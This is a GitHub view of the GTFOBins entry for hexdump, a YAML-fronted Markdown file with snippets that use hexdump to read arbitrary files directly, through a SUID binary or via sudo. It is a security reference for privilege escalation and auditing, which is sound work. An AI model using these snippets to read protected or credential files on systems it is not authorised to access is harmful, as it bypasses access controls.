GTFOBins.github.io/_gtfobins/hexdump.md

16 lines
262 B
Markdown
Raw Normal View History

2020-03-17 07:50:20 +01:00
---
functions:
file-read:
- code: |
LFILE=file_to_read
hexdump -C "$LFILE"
suid:
- code: |
LFILE=file_to_read
./hexdump -C "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo hexdump -C "$LFILE"
---